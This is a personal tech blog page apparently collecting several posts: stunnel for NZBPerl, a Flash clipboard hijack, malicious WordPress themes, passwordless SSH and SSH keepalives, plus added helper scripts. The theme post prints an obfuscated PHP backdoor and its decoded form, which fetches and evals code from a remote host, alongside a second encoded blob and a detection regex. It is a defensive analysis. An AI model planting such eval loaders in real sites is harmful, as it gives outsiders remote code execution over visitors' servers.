NZBPerl and SSL (using stunnel4)

SSL is a fairly recent addition (seemingly) to the usenet client arena; most clients that support it have only added support within the past two years or so. I’m giving NZBPerl a try, mostly because it’s the only one that fits in natively with Torrentflux b4rt. NZBPerl “technically” supports SSL (with the --ssl switch), but in practice it hangs and never really accomplishes its tasks. It’s all over teh interwebs that NZBPerl doesn’t quite work with SSL, but since the author last released in late 2006, it’s not likely to see an update to properly support SSL.

I spent about 4 hours over the weekend playing around with the source to no avail. If I could have found a working patch, I would have applied it and submitted it upstream… that would have been ideal, of course.

So I instead used the haxy method: wrap the non-SSL NNTP requests in stunnel, which effectively accomplishes the same goal. Here is the setup I used in Ubuntu:

# superuser assumed
apt-get install stunnel4
vim /etc/stunnel/snntp.conf
# put in the following
foreground=yes
client=yes
[nntp]
accept  = 127.0.0.1:119
connect = SECURE_NEWS_SERVER:563
# /put
stunnel4 /etc/stunnel/snntp.conf 1>>/var/log/stunnel.log 2>&1 &

Then in Torrentflux-b4rt, enable NZBPerl (ensuring the prerequisites are met first), set the server hostname to 127.0.0.1, add your username/password to the list, and give it a try. Inspect /var/log/stunnel.log if there are any issues. Worked like a charm for me.
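An added example (not from the post) of the same stunnel client setup with server certificate verification switched on. The config above forwards plain NNTP over TLS, but with no verify/CAfile lines stunnel accepts whatever certificate the far end presents, so the tunnel hides traffic from a passive observer but does not stop a spoofed news server. The news server name, the CA bundle path and the output file are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): generate an stunnel4 client
# config like the one in the post, but with peer certificate verification
# enabled. NEWS_SERVER, CA_BUNDLE and the output path are placeholders.

# Default CA bundle on Debian/Ubuntu from the ca-certificates package (assumption).
CA_BUNDLE="${CA_BUNDLE:-/etc/ssl/certs/ca-certificates.crt}"

# write_snntp_conf NEWS_SERVER OUTFILE
# Writes a client-mode config that accepts plain NNTP on 127.0.0.1:119 and
# forwards it over TLS to NEWS_SERVER:563. verify = 2 makes stunnel refuse
# any server whose certificate does not chain to a CA in CAfile.
write_snntp_conf() {
    server="$1"
    out="$2"
    cat > "$out" <<EOF
foreground = yes
client = yes
; reject servers whose certificate does not chain to a trusted CA
verify = 2
CAfile = $CA_BUNDLE

[nntp]
accept  = 127.0.0.1:119
connect = $server:563
EOF
}

# conf_verifies_peer FILE: exit 0 only if the config enables chain verification
conf_verifies_peer() {
    grep -q '^verify *= *2' "$1" && grep -q '^CAfile *= *.' "$1"
}

# conf_bound_to_loopback FILE: exit 0 only if the plaintext side listens on
# loopback; binding 0.0.0.0 would offer unauthenticated NNTP to the network
conf_bound_to_loopback() {
    grep -q '^accept *= *127\.0\.0\.1:119' "$1"
}
```

Write the file with write_snntp_conf SECURE_NEWS_SERVER /etc/stunnel/snntp.conf and start stunnel4 exactly as in the post. verify = 2 checks the certificate chain only; stunnel 5 adds a checkHost option that also matches the certificate name against the server you configured.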


Flash Clipboard Hijack

Apparently there are some malicious Adobe Flash ads out there that can hijack your browser clipboard. The issue affects Linux, Windows and OS X; Firefox, Safari and Internet Explorer — basically any client that relies on the Adobe Flash plugin. If you don’t believe it, check out the proof of concept (you have been warned). That particular site hijacks your clipboard with “http://evil.com”.

I saw this today when my browser (Firefox 3.0.1 — latest on Windows XP — patched) wouldn’t let me copy and paste text. Every time I pressed CTRL-V I got the same potential-malware link [http://windowsxp-privacy.com/?id=…]. After some digging around, I realized it was localized to my browser (I thought for sure it was a system issue at first), so to fix it I closed and re-opened the browser. That resolved the issue.

Considering the manual effort required to update Flash, combined with the fact that I usually only install Flash when a computer is built and never update it, I believe this issue is widespread and not going to be fixed anytime soon. It’s a minor annoyance, but still, a pretty neat little exploit.


WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper and saw this in his theme’s header.php (I added the newlines for display purposes):

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBRE
Q3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJ
FIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3M
EQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5Qzg
wRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSA
id3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5
MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0
RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYx
MkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVu
Y29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkU
jNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTN
FRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQ
TgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3
d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2Ln
BocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hU
VFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQ
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with newlines added for readability):

// pick whichever of the two hosts answers on port 80 (3 second timeout)
if ($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
elseif ($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
else
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";

@eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');

if ($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {
    // allow_url_fopen on: fetch PHP from the remote host and execute it,
    // reporting the visited URL and host name in the query string
    $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
    $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
    @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
} else {
    // allow_url_fopen off: fall back to echoing the remote content into the page
    $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
    $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
}
// the fclose() on a failed (false) socket is what produced the visible error
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php

eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
')));

Which doesn’t turn out to be as bad: only a few links (run it yourself if you’re interested; I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted; they don’t need any more PageRank. Who knew people were so shady. I urge those looking for WordPress themes to stay away from sites such as these.
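An added example (not from the post) of the check worth running over any downloaded theme before activating it: both infections above have the same shape, a PHP eval() fed by base64_decode() or gzinflate(), which legitimate theme code has no reason to contain. The scanner below flags those idioms and can extract a single-line base64 payload for reading without executing it. Directory layout and sample files are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): scan a WordPress theme tree for
# the obfuscation idioms seen above, eval(base64_decode(...)) and
# eval(gzinflate(base64_decode(...))), and decode a payload for inspection.

# eval with an optional @ error-suppressor, optional whitespace, fed by a
# decoder/inflater. Case-insensitive because PHP function names are.
SUSPECT_RE='@?eval *\( *@?(base64_decode|gzinflate|gzuncompress|str_rot13) *\('

# scan_theme_dir DIR
# Prints "file:line:content" for every hit in *.php under DIR.
# Exit status 0 means nothing found, 1 means suspicious code is present.
scan_theme_dir() {
    # /dev/null forces grep to print the file name even for a single file
    out=$(find "$1" -type f -name '*.php' -exec grep -nEi "$SUSPECT_RE" /dev/null {} \;)
    [ -n "$out" ] || return 0
    printf '%s\n' "$out"
    return 1
}

# show_base64_payload FILE
# Extracts the first single-line base64_decode('...') argument and decodes it
# so the hidden source can be read; nothing is executed. Payloads split
# across lines (as in the post) must be joined first.
show_base64_payload() {
    sed -n "s|.*base64_decode('\([A-Za-z0-9+/=]*\)').*|\1|p" "$1" | head -n 1 | base64 -d
}
```

Run scan_theme_dir on the wp-content/themes directory; a non-zero exit makes it usable from cron or a deployment check, and show_base64_payload gives a safe look at what a flagged line would have executed.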

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.


How to SSH w/o a password on FreeBSD

Adapted from a Berkeley guide: if you want to be able to SSH between Unix or Linux boxes (e.g. FreeBSD) without repeatedly entering the password, this guide will show you how.

First step, on the client, run the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa

Have it use the default location (~/.ssh/id_rsa), and make sure there is no passphrase. This creates a file containing the private key (id_rsa) and a file containing the public key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 authorized_keys2

That’s it! Now connect from the client to the server with this command:

ssh server

If that doesn’t work (i.e. it still prompts for your password), you may have to try a few things. On one box I tried, it worked as above. On another, I had to do the following:

ssh -i ~/.ssh/id_rsa server

If that works, add these two lines to ~/.ssh/config (creating the file if it doesn’t exist):

Host server
    IdentityFile ~/.ssh/id_rsa

If you SSH as much as I do, this can save lots of time.


FreeBSD SSH session timeouts

I was tired of seeing this while logging into my server via SSH:

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure the connection is being closed by some firewall in between. So as a solution, I installed spinner:

cd /usr/ports/sysutils/spinner/
make install clean
spinner

It puts a character in the top-left corner of the console, which keeps the session alive with a minimal amount of data transfer.

Works great! 🙂
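An added example (not from either post) that scripts the key-based login from the "How to SSH w/o a password" guide above together with a fix for the idle disconnect described in this post: sshd refuses keys in a world-readable ~/.ssh or authorized_keys, so the permissions are set explicitly, and the Host stanza gets a ServerAliveInterval so ssh itself sends encrypted keepalives instead of relying on spinner's screen output. The key line, directory and host names are placeholders; the same convenience is available with a passphrase-protected key loaded into ssh-agent.

```shell
#!/bin/sh
# Added example (not from the original posts). Paths and the public key line
# passed in are placeholders; nothing here generates a key, it installs one
# produced by ssh-keygen as in the post.

# install_authorized_key HOME_DIR PUBKEY_LINE
# Appends one public-key line (the contents of id_rsa.pub) to
# HOME_DIR/.ssh/authorized_keys, skipping it if already present, and sets
# the permissions sshd insists on (0700 directory, 0600 file).
# authorized_keys2 is the older name; sshd's default AuthorizedKeysFile
# reads both, so either file works.
install_authorized_key() {
    home="$1"; key="$2"
    mkdir -p "$home/.ssh"
    chmod 700 "$home/.ssh"
    ak="$home/.ssh/authorized_keys"
    touch "$ak"
    chmod 600 "$ak"
    # -x: whole line, -F: literal match, so an identical key is never duplicated
    if ! grep -qxF -- "$key" "$ak"; then
        printf '%s\n' "$key" >> "$ak"
    fi
}

# add_host_stanza CONFIG ALIAS HOSTNAME IDENTITY
# Appends a Host block to an ssh_config file once (idempotent by alias).
# IdentityFile is the -i workaround from the post made permanent,
# IdentitiesOnly stops ssh offering every key it knows, and
# ServerAliveInterval sends a keepalive inside the encrypted channel every
# 60 s so an in-path firewall does not drop the idle session.
add_host_stanza() {
    cfg="$1"; name="$2"; host="$3"; ident="$4"
    mkdir -p "$(dirname "$cfg")"
    touch "$cfg"
    chmod 600 "$cfg"
    if grep -q "^Host $name\$" "$cfg"; then
        return 0
    fi
    cat >> "$cfg" <<EOF
Host $name
    HostName $host
    IdentityFile $ident
    IdentitiesOnly yes
    ServerAliveInterval 60
    ServerAliveCountMax 3
EOF
}

# file_mode PATH: print the symbolic mode column, e.g. -rw-------
file_mode() {
    ls -ld "$1" | cut -c1-10
}

# private_key_ok KEYFILE: exit 0 only if the key exists and is owner-only,
# which is what ssh requires before it will use the key at all
private_key_ok() {
    [ -f "$1" ] && [ "$(file_mode "$1")" = "-rw-------" ]
}
```

On the server run install_authorized_key "$HOME" "$(cat id_rsa.pub)" with the key copied from the client; on the client run add_host_stanza ~/.ssh/config server raybdbomb.com ~/.ssh/id_rsa and check private_key_ok ~/.ssh/id_rsa before the first ssh server.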
